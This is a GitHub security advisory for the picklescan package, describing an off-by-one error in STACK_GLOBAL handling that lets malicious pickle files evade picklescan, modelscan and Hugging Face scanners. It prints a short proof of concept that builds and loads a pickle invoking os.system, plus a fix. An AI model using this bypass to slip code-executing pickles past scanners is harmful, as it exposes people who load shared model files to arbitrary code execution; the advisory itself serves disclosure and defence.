GHSA-9gvj-pp9x-gcfr
Suggest an improvement- Source
- https://github.com/advisories/GHSA-9gvj-pp9x-gcfr
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-9gvj-pp9x-gcfr/GHSA-9gvj-pp9x-gcfr.json
- JSON Data
- https://api.test.osv.dev/v1/vulns/GHSA-9gvj-pp9x-gcfr
- Published
- 2025-08-12T00:13:55Z
- Modified
- 2025-08-12T00:19:05.593238Z
- Severity
-
- 8.9 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P CVSS Calculator
- Summary
- Picklescan has pickle parsing logic flaw that leads to malicious pickle file bypass
- Details
-
Details
There's a parsing logic error in picklescan and modelscan while trying to deal with opcode
STACK_GLOBAL. Function_list_globalswhen handlingSTACK_GLOBALat positionn, it is expected to track two arguments but in wrong range. The loop only consider the range from1ton-1but forgets to consider the opcode at position0. The correct range should be0ton-1. Attacker can put arg in position0, thus the parser can only tract one argument. Then, the exception https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L281 will be triggered. Thus it can cause detection bypass since the malicious pickle file will trigger unexpected exceptions.Example:
0: S STRING 'os' --> arg 0: STRING (untracked argument due to wrong scanning range) 6: S STRING 'system' --> arg 1: STRING (tracked argument) 16: \x93 STACK_GLOBAL 17: S STRING 'ls' 23: \x85 TUPLE1 24: R REDUCE 25: . STOPPoC
import pickle payload = b"S'os'\nS'system'\n\x93S'ls'\n\x85R." with open('bad_pickle.pkl', 'wb') as f: f.write(payload) pickle.load(open('bad_pickle.pkl', 'rb'))Impact
Detection bypass in both picklescan and modelscan. Note that it also affects the online hugging face pickle scanners, making the malicious pickle file bypass the detection.
Fix
To fix the range here, change
range(1, n)torange(1, n+1)to ensure thatn-offsetstays within the range of0ton. https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L255 - Database specific
{ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-08-12T00:13:55Z", "nvd_published_at": null, "cwe_ids": [ "CWE-502" ] }- References
-
- https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9gvj-pp9x-gcfr
- https://github.com/mmaitre314/picklescan/commit/58983e1c20973ac42f2df7ff15d7c8cd32f9b688
- https://github.com/mmaitre314/picklescan
- https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L255
- https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L281
- https://github.com/mmaitre314/picklescan/releases/tag/v0.0.27
Affected packages
PyPI / picklescan
Package
- Name
- picklescan
- View open source insights on deps.dev
- Purl
- pkg:pypi/picklescan